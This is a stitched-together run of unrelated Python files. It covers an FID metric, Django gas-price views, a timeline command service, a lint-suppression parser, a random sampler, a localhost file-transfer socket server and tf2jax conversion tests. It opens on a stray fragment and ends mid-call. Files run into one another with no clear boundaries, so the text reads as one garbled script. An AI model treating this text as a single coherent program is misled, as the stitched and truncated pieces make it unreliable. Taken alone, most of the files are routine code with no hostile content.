HtmlLexer super().__init__(HtmlLexer, SlashLanguageLexer, **options) #!/usr/bin/env python from distutils.core import setup setup(name = "quasi", version = "0.87", description = "A multiple-context Python shell", author = "<NAME>", author_email = "<EMAIL>", url = "http://quasi-shell.sourceforge.net/", license = "BSD", scripts = ["quasi.py"], data_files = [("share/licenses/quasi", ["LICENSE"])], extra_path = "quasi", packages = ["."] ) import torch from . import model from .metric import MultiImageMetric, Union, List from . import utils import torch.nn.functional as F import numpy as np __all__ = ['FID'] class FID(MultiImageMetric): def __init__(self, input_type, eps=1e-6) -> None: super().__init__() if input_type not in ['image', 'feature']: msg = 'input_type should be image or feature, but got {}'.format( input_type) raise ValueError(msg) self.input_type = input_type self.eps = eps if input_type == 'image': self.inception = model.fid.InceptionV3() self.inception.eval() def calc( self, images_a: Union[torch.Tensor, List[torch.Tensor]], images_b: Union[torch.Tensor, List[torch.Tensor]]) -> torch.Tensor: if self.input_type == 'feature': features_a = images_a features_b = images_b else: features_a = self.calc_feature(images_a) features_b = self.calc_feature(images_b) mu_a = torch.mean(features_a, dim=0) mu_b = torch.mean(features_b, dim=0) sigma_a = torch.cov(features_a.t()) sigma_b = torch.cov(features_b.t()) diff_mu = mu_a - mu_b covmean, error = utils.sqrtm_newton_schulz(sigma_a.mm(sigma_b), num_iters=100) if not torch.isfinite(covmean).all(): offset = utils.to_device( torch.eye(sigma_a.size(0), dtype=sigma_a.dtype) * self.eps, utils.get_device(sigma_a)) covmean, error = utils.sqrtm_newton_schulz( (sigma_a + offset).mm(sigma_b + offset), num_iters=100) fid = diff_mu.dot(diff_mu) + torch.trace(sigma_a + sigma_b - 2 * covmean) return fid def calc_feature(self, images: Union[torch.Tensor, List[torch.Tensor]]): if not hasattr(self, 'inception'): self.inception = model.fid.InceptionV3() self.inception.eval() images = [ F.interpolate(image.unsqueeze(0), size=(299, 299), mode='bilinear', align_corners=False) for image in images ] images = torch.cat(images, dim=0) images = 2 * images - 1 features = self.inception(images)[0].squeeze(2).squeeze(2) return features import datetime from django.utils import timezone from django.utils.dateparse import parse_datetime from drf_yasg import openapi from drf_yasg.utils import swagger_auto_schema from rest_framework.generics import ListAPIView from rest_framework.pagination import LimitOffsetPagination from 
rest_framework.response import Response from rest_framework.views import APIView from .gas_station import GasStationProvider from .models import GasPrice from .serializers import GasPriceSerializer class DefaultPagination(LimitOffsetPagination): max_limit = 500 default_limit = 500 class GasStationView(APIView): @swagger_auto_schema(responses={200: GasPriceSerializer()}) def get(self, request, format=None): """ Gets current gas prices for the ethereum network (using last 200 blocks) `Lowest` and `fastest` are the lower and the higher gas prices found in those blocks The rest are percentiles on all the gas prices in the last blocks. `safe_low=percentile 30`, `standard=percentile 50` and `fast=percentile 75` """ gas_station = GasStationProvider() gas_prices = gas_station.get_gas_prices() serializer = GasPriceSerializer(gas_prices) return Response(serializer.data, headers={"Cache-Control": f"max-age={60 * 4}"}) class GasStationHistoryView(ListAPIView): serializer_class = GasPriceSerializer pagination_class = DefaultPagination def get_queryset(self): from_date = self.request.query_params.get("fromDate") to_date = self.request.query_params.get("toDate") from_date = ( parse_datetime(from_date) if from_date else timezone.now() - datetime.timedelta(days=30) ) to_date = parse_datetime(to_date) if to_date else timezone.now() return GasPrice.objects.filter(created__range=[from_date, to_date]).order_by( "created" ) @swagger_auto_schema( manual_parameters=[ openapi.Parameter( "fromDate", openapi.IN_QUERY, type=openapi.TYPE_STRING, format="date-time", description="ISO 8601 date to filter stats from. If not set, 1 month before now", ), openapi.Parameter( "toDate", openapi.IN_QUERY, type=openapi.TYPE_STRING, format="date-time", description="ISO 8601 date to filter stats to. 
If not set, now", ), ] ) def get(self, request, *args, **kwargs): return super().get(request, *args, **kwargs) <filename>src/application/commands_service.py import logging from src.domain.messages.message import Message from src.domain.users.user import User from src.domain.messages.message import Message def post(repo, username: str, message: str): res = False logging.debug(f"[+] {username} user is posting: {message}.") user = User.from_dict(repo.get_user(username = username)) if user: message = Message(content = message, user_id = user.id) res = repo.insert_message(message= message.to_dict()) else: raise Exception(f"{username} user not found") return res def read(repo, username: str): res = None logging.debug(f"[+] Reading {username}'s timeline") user = User.from_dict(repo.get_user(username = username)) if user: res = repo.get_messages(user_ids = [user.id]) username = { user.id: user.username } Message.print_messages(messages = res, usernames = username) else: raise Exception(f"{username} user not found") return res def follow(repo, username: str, follow_username: str): res = False logging.debug(f"[+] User {username} wants to follow user {follow_username}.") user = User.from_dict(repo.get_user(username = username)) follow_user = User.from_dict(repo.get_user(username = follow_username)) if user: if follow_user: user.add_follow(follow_user.id) res = repo.update_user(user = user.to_dict()) else: raise Exception(f"{follow_username} user to follow not found") else: raise Exception(f"{username} user not found") return res def wall(repo, username: str): res = None logging.debug(f"[+] Reading user {username} wall.") user = User.from_dict(repo.get_user(username = username)) if user: ids = [user.id] # Username is a dict key-value (id-username) usernames = { user.id: user.username } if user.follows and isinstance(user.follows, list): ids.extend(user.follows) for f in user.follows: usernames.update({ f: repo.get_user_by_id(f).get('username') }) res = repo.get_messages(user_ids = ids) Message.print_messages(messages = res, usernames = usernames) else: raise Exception(f"{username} user not found") return res<filename>neighbourhood/migrations/0008_auto_20220110_2206.py<gh_stars>0 # Generated by Django 3.2.9 on 2022-01-10 19:06 from django.conf import settings from django.db import migrations, models import django.db.models.deletion class Migration(migrations.Migration): dependencies = [ migrations.swappable_dependency(settings.AUTH_USER_MODEL), ('neighbourhood', '0007_alter_profile_user'), ] operations = [ migrations.AddField( model_name='profile', name='created_at', field=models.DateTimeField(auto_now_add=True, null=True), ), migrations.AlterField( model_name='profile', name='bio', field=models.TextField(max_length=1000, null=True), ), migrations.AlterField( model_name='profile', name='user', field=models.OneToOneField(null=True, on_delete=django.db.models.deletion.CASCADE, related_name='profile', to=settings.AUTH_USER_MODEL), ), ] <filename>src/mam/_mam/tasks/mutations/nosa.py<gh_stars>0 """Handle nosa comments.""" from __future__ import annotations import itertools import logging import operator import re import tokenize from typing import Any, Iterator, List, Optional, Tuple from ...core.objects import Format, LESS, Less, Message # nosa(2): pylint[C0103] _get_path = operator.attrgetter('path') logger = logging.getLogger(__name__) class Position: """Position states.""" PREV = object() NEXT = object() NEXT_ORIG = object() class Scope: """Scope states.""" COMMENT = object() DEFINITION = object() 
EMPTY_LINE = object() SCOPE_TO_POSITION = { Scope.COMMENT: Position.NEXT, Scope.DEFINITION: Position.NEXT, Scope.EMPTY_LINE: Position.NEXT_ORIG, } TokenPosition = Tuple[int, tokenize.TokenInfo] Scoped = Tuple[object, List[tokenize.TokenInfo]] def _convert_scope(queue: List[Scoped], comment_global: bool = True, ) -> Iterator[Scoped]: """Convert from Scope to Position.""" for i, (type_, values) in enumerate(queue): if (comment_global and type_ is Scope.COMMENT and any(Scope.DEFINITION == t for t, _ in queue[i:]) ): yield Position.NEXT_ORIG, values else: yield SCOPE_TO_POSITION[type_], values def handle_queue(queue: List[Scoped], scope: int, prev: int, prev_orig: int, ) -> Iterator[TokenPosition]: """Handle queue.""" place = { Position.PREV: prev, Position.NEXT: scope, Position.NEXT_ORIG: prev_orig, } for position, values in _convert_scope(queue): pos = place[position] for value in values: yield (pos, value) # TODO: fix scopes def _with_scope(tokens: Iterator[tokenize.TokenInfo], ) -> Iterator[TokenPosition]: """Add scope to tokens.""" queue: List[Scoped] = [] prev = 1 prev_orig = 1 for line, values in itertools.groupby(tokens, lambda i: i.line): striped_line = line.lstrip(' ') if striped_line.startswith('#'): queue.append((Scope.COMMENT, list(values))) elif not line.strip(): queue.append((Scope.EMPTY_LINE, list(values))) elif (striped_line.startswith('def') or striped_line.startswith('class') ): queue.append((Scope.DEFINITION, list(values))) prev_orig = len(line) - len(striped_line) + 1 else: scope = len(line) - len(striped_line) + 1 yield from handle_queue(queue, scope, prev, prev_orig) for value in values: yield (scope, value) queue = [] prev = prev_orig = scope if queue: yield from handle_queue(queue, 1, prev, prev_orig) TOKEN_EMPTY = { tokenize.NEWLINE, tokenize.NL, tokenize.DEDENT, tokenize.INDENT, } TScope = Tuple[int, List] # nosa: flake8-annotations-complexity[TAE002] def _find_nosa(path: str) -> Iterator[Tuple[str, bool, int, Tuple[int, int]]]: """Find NOSA in path.""" if path is LESS: return # Test scopes: List[TScope] = [(-1, [])] line_no = 0 with open(path, 'rb') as file: prev = None tokens = _with_scope(tokenize.tokenize(file.readline)) for spaces, (token_type, value, (line_no, _), _, _) in tokens: if spaces > len(scopes): for _ in range(spaces - len(scopes)): scopes.append((line_no, [])) elif spaces < len(scopes): for beginning, scope in scopes[spaces:]: for nosa, nosa_type, location in scope: yield nosa, nosa_type, location, (beginning, line_no) del scopes[spaces:] if token_type == tokenize.COMMENT: nosa_type = prev in TOKEN_EMPTY scopes[-1][1].append((value, nosa_type, line_no)) else: prev = token_type for beginning, scope in scopes: for nosa, nosa_type, location in scope: yield nosa, nosa_type, location, (beginning, line_no) class ErrorValue: """NOSA error values.""" def __init__(self, code: str, message: str) -> None: """Initialize ErrorValue.""" self.code = code self.message = message def __str__(self) -> str: """Convert into string form.""" output = str(self.code) if self.message: output += ':' + self.message return output def __contains__(self, item: Message): """Check item contains the code and/or message.""" if self.code and not isinstance(item.code, Less): if not item.code.startswith(self.code): return False if self.message and not isinstance(item.message, Less): if self.message not in item.message: return False return True @classmethod def from_string(cls, value: str) -> ErrorValue: """Build from string form.""" code, message, *_ = value.split(':') + [''] return 
cls(code, message) class Error: """Contain program and values of NOSA comments.""" def __init__(self, programs: List[str], values: List[ErrorValue]) -> None: """Initialize Error.""" self.programs = programs self.values = values def __str__(self) -> str: """Convert into non-ambiguous string form.""" programs = ','.join(self.programs) programs = f'({programs})' values = ','.join(str(v) for v in self.values) values = f'[{values}]' return programs + values def __contains__(self, item: Message): """Check if item is applicable program with value.""" if self.programs and item.app is not LESS: if item.app not in self.programs: return False if self.values: if not any(item in value for value in self.values): return False return True @classmethod def from_string(cls, error: str) -> Error: """Build from string form.""" start, end, *_ = error.split('[', 1) + [''] if start.startswith('('): start = start[1:-1] elif not end: end = start + ']' start = '' if start: start_ = start.split(',') else: start_ = [] if end: end = end[:-1] return cls( start_, [ ErrorValue.from_string(e) for e in end.split(',') ], ) class State: """Error parsing states.""" GLOBAL = object() BRACKET = object() class Errors: """Errors holder.""" def __init__(self, errors: List[Error]) -> None: """Initialize Errors.""" self.errors = errors def __str__(self): """Convert to string form.""" return ','.join(str(e) for e in self.errors) def __contains__(self, item: Message): """Check if contains error.""" return any(item in error for error in self.errors) def __len__(self): """Amount of errors.""" return len(self.errors) @staticmethod def _split_top_level_errors(errors): """Split sub-errors.""" if errors is None: return [] split_errors = [] name = [] state = State.GLOBAL for char in errors: if char in ' ' and state is State.GLOBAL: break elif char in '([': name.append(char) state = State.BRACKET elif char in '])': name.append(char) state = State.GLOBAL elif char == ',' and state is State.GLOBAL: split_errors.append(''.join(name)) name = [] else: name.append(char) if name: split_errors.append(''.join(name)) return split_errors @classmethod def from_string(cls, errors: str) -> Errors: """Build Errors from string form.""" return cls([ Error.from_string(error) for error in cls._split_top_level_errors(errors) ]) class NOSA: """NOSA comment.""" def __init__(self, name: str, stop: int, start: int, errors: Errors): """Initialize NOSA.""" self.name = name self.start = start self.stop = stop self.errors = errors def __str__(self): """Build string.""" ret = f'{self.name}({self.start}->{self.stop})' if self.errors: ret += f': {self.errors}' return ret def __contains__(self, item: Message): """Check if message should be silenced.""" if (not isinstance(item.line, Less) and not self.start <= int(item.line) <= self.stop ): return False return item in self.errors # nosa(2): pylint[R0913] @classmethod def from_comment(cls, string: str, type_: bool, location: int, start: int, # nosa: pylint[W0613] stop: int, *, _nosa: str = 'nosa', ) -> Optional[NOSA]: """Build NOSA from string.""" if _nosa not in string: return None regex = '(' + _nosa + r')(?:\((\d*)(?:,(\d*))?\))?(?:: (.*))?' 
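# The optional regex groups are: (1) the keyword itself, (2) how many lines below the
# comment the suppression extends, (3) how many lines above it extends, and (4) the
# error spec after ': '.  For example, "# nosa(2,1): pylint[C0103]" silences pylint
# C0103 from one line above the comment through two lines below it.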
match = re.search(regex, string) if match is None: return None groups: List[Any] = list(match.groups()) if groups[1] == '' or groups[1] is None: groups[1] = stop if type_ else location else: groups[1] = location + int(groups[1]) if groups[2] == '' or groups[2] is None: groups[2] = location else: groups[2] = location - int(groups[2]) if groups[3] == '': groups[3] = None if groups[3]: groups[3] = Errors.from_string(groups[3]) return cls(*groups) def _filter_nosa(comments, _nosa='nosa'): """Filter all comments to ones that are nosa.""" for comment, type_, location, (start, stop) in comments: nosa = NOSA.from_comment( comment, type_, location, start, stop, _nosa=_nosa, ) if nosa is not None: yield nosa def remove_nosa(objects): """Remove errors in accordance to nosa.""" for path, group in itertools.groupby(objects, _get_path): nosas = list(_filter_nosa(_find_nosa(path))) unused = [True] * len(nosas) for item in group: unmuted = True for i, nosa in enumerate(nosas): if item in nosa: unused[i] = False unmuted = False if unmuted: yield item for nosa in itertools.compress(nosas, unused): logger.info(Format('Unused nosa: {0!s}', nosa)) <reponame>off99555/sktime # -*- coding: utf-8 -*- """Module exports: series type converters.""" __all__ = ["convert", "convert_to", "mtype"] from sktime.forecasting.base.convertIO._convertIO import convert, convert_to, mtype def check_nondecreasing(si): return all(int(si[i-1]) <= int(si[i]) for i in range(1,6)) def check_no_run_doubles(si): mp = [si[i-1] == si[i] for i in range(1,6)] # "matches previous" if not any(mp): return False #edges if mp[0] == 1 and mp[1] == 0: return True if mp[4] == 1 and mp[3] == 0: return True ok = [1 for i in range(1,4) if (mp[i] == 1 and mp[i-1] == 0 and mp[i+1] == 0)] return ok print(check_nondecreasing('123456'), 'true') print(check_nondecreasing('100001'), 'false') print("") print(check_no_run_doubles('111166'), 'true') print(check_no_run_doubles('123566'), 'true') print(check_no_run_doubles('113596'), 'true') print(check_no_run_doubles('113455'), 'true') print(check_no_run_doubles('112244'), 'true') print(check_no_run_doubles('111455'), 'false') print(check_no_run_doubles('125556'), 'false') print(check_no_run_doubles('123456'), 'false') count = 0 for i in range(307237, 769058): si = str(i) if check_nondecreasing(si) and check_no_run_doubles(si): count += 1 print(count)<filename>delira/data_loading/sampler/random.py from delira.data_loading.sampler.abstract import AbstractSampler import numpy as np class RandomSampler(AbstractSampler): """ A Generic Random Sampler """ def __init__(self, indices, replacement=False, num_samples=None): """ Parameters ---------- indices : list the indices containing the classes to sample from replacement : bool whether to sample with or without replacement num_samples : int the number of samples to provide. 
Must only be specified if :param:`replacement` is True; If not specified, it defaults to the number of samples present in :param:`indices` """ super().__init__(indices) if replacement and num_samples is None: num_samples = len(self._indices) self._replacement = replacement self._num_samples = num_samples def __iter__(self): """ Returns an iterator returning random samples Returns ------- Iterator an iterator returning random samples """ n = len(self._indices) if self._replacement: return iter(np.random.randint(n, size=self._num_samples).tolist()) possible_samples = np.arange(n) np.random.shuffle(possible_samples) return iter(possible_samples) def __len__(self): """ Defines the length of the sampler Returns ------- int the number of samples """ if self._replacement: return self._num_samples else: return super().__len__() class RandomSamplerNoReplacement(RandomSampler): """ A Random Sampler without replacement """ def __init__(self, indices): """ Parameters ---------- indices : list the indices containing the classes to sample from """ super().__init__(indices, False, None) class RandomSamplerWithReplacement(RandomSampler): """ A Random Sampler With Replacement """ def __init__(self, indices, num_samples=None): """ Parameters ---------- indices : list the indices containing the classes to sample from num_samples : int number of samples to provide, if not specified: defaults to the amount values given in :param:`indices` """ super().__init__(indices, True, num_samples) from threading import Thread from queue import Queue import socket import struct import os HOST = '127.0.0.1' PORT = 5005 PACKET_SIZE = 1024 SUCCESS = b'File Has Been Transferred' SAVEPATH = "server_data" def writeFile(payload, fileName): with open(file=fileName, mode="w+b") as dataFile: dataFile.write(payload) def checkSaveDir(): if not os.path.isdir(SAVEPATH): command = f"mkdir {SAVEPATH}" os.system(command) def pipeHandler(pipe): checkSaveDir() while True: while not pipe.empty(): message = pipe.get() print("\n\nA new payload has arrived ...") print("Client suggests naming of this file as:\n'{}'".format(message["name"])) fileName = input('\nEnter "ok" to use the suggested name\nOtherwise enter the name you wish to save the file as\n(leave blank to not save)\n') if fileName: if fileName == "ok": fileName = message["name"] print("Using client suggested name") else: print(f"Saving file as: {fileName}") print("\nSaving file ...") try: saveFile(fileName=fileName, payload=message["payload"]) print("File has been saved ... 
") except Exception as e: print(f"Failed to save file\nError {e}") else: print("User has elected to not save this file...") print("\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n") def saveFile(fileName, payload): filePath = os.path.join(SAVEPATH, fileName) with open(file=filePath, mode="w+b") as dataFile: dataFile.write(payload) def main(pipe): while True: with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as sock: sock.bind((HOST, PORT)) sock.listen() conn, addr = sock.accept() count = 1 first = True payload = b'' with conn: print('Connected by', addr) while True: data = conn.recv(1024) if first: first = False numOfPackets = struct.unpack('I', data[0:4])[0] lengthOfName = struct.unpack('I', data[4:8])[0] name = data[8:8 + lengthOfName].decode("utf-8") data = data[8 + lengthOfName:] if not data: break count += 1 payload += data if count == numOfPackets: print("Entire contents of file have been received") conn.sendall(SUCCESS) break message = {"payload": payload, "name": name} pipe.put(message) if __name__ == '__main__': os.system("clear") pipe = Queue(maxsize=0) socketServer = Thread(target=main, args=(pipe,)) userInput = Thread(target=pipeHandler, args=(pipe,)) socketServer.start() userInput.start() # Copyright 2021 DeepMind Technologies Limited. All Rights Reserved. # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. # ============================================================================== """Tests tf2jax.""" from absl.testing import parameterized import chex import haiku as hk import jax import jax.numpy as jnp import numpy as np import sonnet as snt import tensorflow as tf from tf2jax._src import tf2jax import tree class ModelsTest(tf.test.TestCase, parameterized.TestCase): def _test_convert(self, tf_func, inputs): jax_func, jax_params = tf2jax.convert( tf.function(tf_func), np.zeros_like(inputs)) jax_func = self.variant(jax_func) jax_results, jax_params = jax_func(jax_params, inputs) tf_results, tf_params = tf_func(inputs) # Check outputs for tf_res, jax_res in zip( tree.flatten(tf_results), tree.flatten(jax_results)): self.assertAllClose(tf_res.numpy(), jax_res, atol=1e-4) # Check params (batchnorm stats changed). 
for tf_var in tree.flatten(tf_params): jax_var = jax_params[tf_var.name.split(":")[0]] self.assertAllClose(tf_var.numpy(), jax_var, atol=1e-5) @chex.variants(with_jit=True, without_jit=True) def test_mlp(self): np.random.seed(42) tf.random.set_seed(42) inputs = np.random.normal(size=(128, 16)).astype(np.float32) model = snt.nets.MLP((64, 10,)) def tf_func(x): outputs = model(x) return outputs, model.variables self._test_convert(tf_func, inputs) @chex.variants(with_jit=True, without_jit=True) @parameterized.named_parameters( chex.params_product( (("inference", False), ("training", True)), named=True, )) def test_resnet(self, training): np.random.seed(42) tf.random.set_seed(42) inputs = np.random.normal(size=(10, 128, 128, 3)).astype(np.float32) model = snt.nets.ResNet([1, 1, 1, 1], 10) def tf_func(x): outputs = model(x, is_training=training) return outputs, model.variables self._test_convert(tf_func, inputs) @chex.variants(with_jit=True, without_jit=True) @parameterized.named_parameters( chex.params_product( (("inference", False), ("training", True)), named=True, )) def test_vqvae(self, training): np.random.seed(42) tf.random.set_seed(42) inputs = np.random.normal(size=(10, 128, 128, 3)).astype(np.float32) model = snt.nets.VectorQuantizer(3, 100, 0.1) def tf_func(x): return model(x, is_training=training), model.variables self._test_convert(tf_func, inputs) class FeaturesTest(tf.test.TestCase, parameterized.TestCase): def _setup_saved_model(self, *inputs): def tf_func(x): return tf.exp(x) # Save. model = tf.Module() model.f = tf.function(tf_func) for inp in inputs: if isinstance(inp, tf.TensorSpec): model.f.get_concrete_function(inp) # Dummy call. else: model.f(np.zeros_like(inp)) # Dummy call. tmp_dir = self.create_tempdir() tf.saved_model.save(model, tmp_dir.full_path) return tf_func, tf.saved_model.load(tmp_dir.full_path) @chex.variants(with_jit=True, without_jit=True) def test_saved_model(self): dummy_inputs = np.zeros([10, 5], dtype=np.float32) tf_func, restored = self._setup_saved_model(dummy_inputs) # Convert to Jax (with and without explicit inputs). 
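# An empty argument tuple takes the convert_from_restored path (no example inputs
# supplied); the non-empty tuple passes dummy_inputs to convert explicitly.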
for inp in [(), (dummy_inputs,)]: if inp: jax_func, _ = tf2jax.convert(restored.f, *inp) else: jax_func, _ = tf2jax.convert_from_restored(restored.f) jax_func = self.variant(jax_func) test_inputs = np.ones([20, 5], dtype=np.float32) expected_outputs = tf_func(test_inputs) with tf2jax.override_config("strict_shape_check", False): actual_outputs, _ = jax_func({}, test_inputs) self.assertAllClose(expected_outputs, actual_outputs) @chex.variants(with_jit=True, without_jit=True) def test_saved_model_ambiguous(self): dummy_one = np.zeros([10, 5], dtype=np.float32) dummy_two = np.zeros([10, 5, 3], dtype=np.float32) tf_func, restored = self._setup_saved_model(dummy_one, dummy_two) with self.assertRaisesRegex(ValueError, "Found 2 concrete functions"): jax_func, _ = tf2jax.convert_from_restored(restored.f) jax_func, _ = tf2jax.convert(restored.f, dummy_two) jax_func = self.variant(jax_func) test_inputs = np.ones([20, 7, 2], dtype=np.float32) expected_outputs = tf_func(test_inputs) with tf2jax.override_config("strict_shape_check", False): actual_outputs, _ = jax_func({}, test_inputs) self.assertAllClose(expected_outputs, actual_outputs) @chex.variants(with_jit=True, without_jit=True) def test_saved_model_functional(self): dummy_inputs = np.zeros([10, 5], dtype=np.float32) tf_func, restored = self._setup_saved_model(dummy_inputs) jax_func = tf2jax.convert_functional_from_restored(restored.f) jax_func = self.variant(jax_func) test_inputs = np.ones([20, 5], dtype=np.float32) expected_outputs = tf_func(test_inputs) with tf2jax.override_config("strict_shape_check", False): actual_outputs = jax_func(test_inputs) self.assertAllClose(expected_outputs, actual_outputs) @chex.variants(with_jit=True, without_jit=True) def test_saved_model_polymorphic_shape(self): dummy_input_spec = tf.TensorSpec((None, None, 2), dtype=tf.float32) tf_func, restored = self._setup_saved_model(dummy_input_spec) jax_func = tf2jax.convert_functional_from_restored(restored.f) jax_func = self.variant(jax_func) test_inputs = np.ones([10, 5, 2], dtype=np.float32) expected_outputs = tf_func(test_inputs) actual_outputs = jax_func(test_inputs) self.assertAllClose(expected_outputs, actual_outputs) @chex.variants(with_jit=True, without_jit=True) def test_strict_check(self): def tf_func(x): return x.shape orig_inputs = np.zeros((10, 5), dtype=np.float32) model = tf.Module() model.f = tf.function(tf_func) model.f(orig_inputs) tmp_dir = self.create_tempdir() tf.saved_model.save(model, tmp_dir.full_path) restored = tf.saved_model.load(tmp_dir.full_path) jax_func = tf2jax.convert_functional_from_restored(restored.f) jax_func = self.variant(jax_func) with self.subTest("valid_input_shape"): expected_outputs = tf_func(orig_inputs) with tf2jax.override_config("strict_shape_check", True): actual_outputs = jax_func(orig_inputs) self.assertAllClose(expected_outputs, actual_outputs) with tf2jax.override_config("strict_dtype_check", True): actual_outputs = jax_func(orig_inputs) self.assertAllClose(expected_outputs, actual_outputs) test_inputs = np.ones([10, 5, 2], dtype=np.float32) with self.subTest("invalid_input_shape"): expected_outputs = tf_func(test_inputs) with tf2jax.override_config("strict_shape_check", True): with self.assertRaisesRegex(ValueError, "incompatible input shape"): actual_outputs = jax_func(test_inputs) with tf2jax.override_config("strict_shape_check", False): actual_outputs = jax_func(test_inputs) self.assertNotAllClose(expected_outputs, actual_outputs) test_inputs = np.ones([10, 5], dtype=np.int32) with 
self.subTest("invalid_input_dtype"): expected_outputs = tf_func(test_inputs) with tf2jax.override_config("strict_dtype_check", True): with self.assertRaisesRegex(ValueError, "incompatible input dtype"): actual_outputs = jax_func(test_inputs) with tf2jax.override_config("strict_dtype_check", False): actual_outputs = jax_func(test_inputs) self.assertAllClose(expected_outputs, actual_outputs) @chex.variants(with_jit=True, without_jit=True) @parameterized.named_parameters( chex.params_product( (("float32", tf.float32), ("float64", tf.float64)), named=True, )) def test_force_bf16_consts(self, tf_dtype): @tf.function def tf_func(x): return x + tf.constant(3.14, dtype=x.dtype) np_inputs = np.array(42.0, tf_dtype.as_numpy_dtype()) tf_outputs = tf_func(np_inputs) dtype_config_name = ("force_const_float32_to_bfloat16" if tf_dtype == tf.float32 else "force_const_float64_to_bfloat16") # This is the default. with tf2jax.override_config(dtype_config_name, False): jax_func = tf2jax.convert_functional(tf_func, np_inputs) jax_func = self.variant(jax_func) orig_jax_outputs = jax_func(np_inputs) self.assertEqual( jnp.array(np_inputs).dtype, jnp.array(orig_jax_outputs).dtype) self.assertAllClose(tf_outputs, orig_jax_outputs) with tf2jax.override_config(dtype_config_name, True): jax_func = tf2jax.convert_functional(tf_func, np_inputs) jax_func = self.variant(jax_func) forced_jax_outputs = jax_func(jnp.asarray(np_inputs, jnp.bfloat16)) self.assertEqual(jnp.bfloat16, forced_jax_outputs.dtype) self.assertAllClose(tf.cast(tf_outputs, tf.bfloat16), forced_jax_outputs) @chex.variants(with_jit=True, without_jit=True) def test_force_bf16_consts_for_leaks(self): @tf.function def tf_func(x): return x + tf.constant(3.14, dtype=tf.float32) np_inputs = np.array(42.0, np.float32) tf_outputs = tf_func(np_inputs) class CachedFn(hk.Module): cache = [] def __init__(self): super().__init__(name=None) if not self.cache: with tf2jax.override_config("force_const_float32_to_bfloat16", True): self.cache.append(jax.jit( tf2jax.convert_functional(tf_func, np_inputs))) def __call__(self, x): return self.cache[0](x) def call_cached_fn(x): return CachedFn()(x) cached_fn = hk.without_apply_rng(hk.transform(call_cached_fn)) params = self.variant(cached_fn.init)(jax.random.PRNGKey(42), np_inputs) jax_inputs = jnp.asarray(np_inputs, jnp.bfloat16) jax_outputs = self.variant(cached_fn.apply)(params, jax_inputs) self.assertEqual(jnp.bfloat16, jax_outputs.dtype) self.assertAllClose(tf.cast(tf_outputs, tf.bfloat16), jax_outputs) def test_static_argnums(self): @tf.function def tf_func(x): return tf.zeros((x,)) with self.subTest("literal_input"): jax_func = tf2jax.convert_functional(tf_func, 10) self.assertEqual(jax_func(10).shape, (10,)) with self.assertRaisesRegex(ValueError, "Found unexpected literal value"): jax_func(13) with self.assertRaisesRegex(ValueError, "Found unexpected tracer"): jax.jit(jax_func)(13) with self.assertRaisesRegex(ValueError, "Found unexpected literal value"): jax.jit(jax_func, static_argnums=0)(13) with self.subTest("array_input"): jax_func = tf2jax.convert_functional(tf_func, np.array(10)) self.assertEqual(jax_func(10).shape, (10,)) self.assertEqual(jax_func(13).shape, (13,)) with self.assertRaisesRegex( TypeError, "Shapes must be 1D sequences of concrete values of integer type"): jax.jit(jax_func)(13) self.assertEqual(jax.jit(jax_func, static_argnums=0)(13).shape, (13,)) @chex.variants(with_jit=True, without_jit=True) @parameterized.named_parameters( chex.params_product( (("with_custom_gradient", True), 
("without_custom_gradient", False)), named=True, )) def test_custom_gradient(self, use_custom_gradient): @tf.function @tf.custom_gradient def tf_func(x): e = tf.exp(x) def grad(dy): # This is deliberately the wrong gradient. return dy * (1 - 1 / (1 + e)) * tf.sin(x) + 0.42 return tf.reduce_sum(tf.math.log(1 + e)), grad np_inputs = np.array(range(6), dtype=np.float32).reshape(3, 2) tf_inputs = tf.constant(np_inputs) with tf.GradientTape() as tape: tape.watch(tf_inputs) tf_outputs = tf_func(tf_inputs) tf_grads = tape.gradient(tf_outputs, tf_inputs) with tf2jax.override_config("convert_custom_gradient", use_custom_gradient): jax_func = tf2jax.convert_functional(tf_func, np.zeros_like(np_inputs)) jax_func = self.variant(jax_func) jax_outputs = jax_func(np_inputs) jax_grads = jax.grad(jax_func)(np_inputs) self.assertAllClose(tf_outputs, jax_outputs) if use_custom_gradient: self.assertAllClose(tf_grads, jax_grads) else: self.assertNotAllClose(tf_grads, jax_grads) @chex.variants(with_jit=True, without_jit=True) def test_trainable(self): can_train = tf.Variable(3.14, trainable=True, name="can_train") not_train = tf.Variable(42., trainable=False, name="not_train") @tf.function def tf_func(x): return x + can_train + not_train np_inputs = np.array(range(6), dtype=np.float32).reshape(3, 2) jax_func, jax_params = tf2jax.convert(tf_func, np.zeros_like(np_inputs)) self.assertTrue(jax_params["can_train"].trainable) self.assertFalse(jax_params["not_train"].trainable) tf_outputs = tf_func(tf.constant(np_inputs)) jax_outputs, _ = self.variant(jax_func)(jax_params, np_inputs) self.assertAllClose(tf_outputs, jax_outputs) @chex.variants(with_jit=True, without_jit=True) @parameterized.named_parameters( chex.params_product( ( ("positional", ((3.14, 42.0), {})), ("positional_and_keyword", ((3.14,), dict(y=42.0))), ("keyword", ((), dict(x=3.14, y=42.0))), ), named=True, )) def test_positional_and_keyword_args(self, all_args): @tf.function def tf_func(x, y): return x + y fn_args, fn_kwargs = tree.map_structure(np.array, all_args) tf_outputs = tf_func(*fn_args, **fn_kwargs) zero_args, zero_kwargs = tree.map_structure(np.zeros_like, all_args) jax_func = tf2jax.convert_functional(tf_func, *zero_args, **zero_kwargs) jax_outputs = self.variant(jax_func)(*fn_args, **fn_kwargs) self.assertAllClose(tf_outputs, jax_outputs) @chex.variants(with_jit=True, without_jit=True) @parameterized.named_parameters( chex.params_product( ( ("no_defaults", lambda *, kw0, kw1: kw0 + kw1), ("some_defaults", lambda *, kw0=3.14, kw1: kw0 + kw1), ("all_defaults", lambda *, kw0=3.14, kw1=42.0: kw0 + kw1), ("all_defaults_some_used", lambda *, kw0=3.14, kw1=42.0, kw2=2.8: kw0 + kw1 + kw2), ), named=True, )) def test_keyword_only(self, fn): tf_func = tf.function(fn) inputs = (np.array(3.5, dtype=np.float32), np.array(7.2, dtype=np.float32)) tf_outputs = tf_func(kw0=inputs[0], kw1=inputs[1]) jax_func = tf2jax.convert_functional( tf_func, kw0=np.zeros_like(inputs[0]), 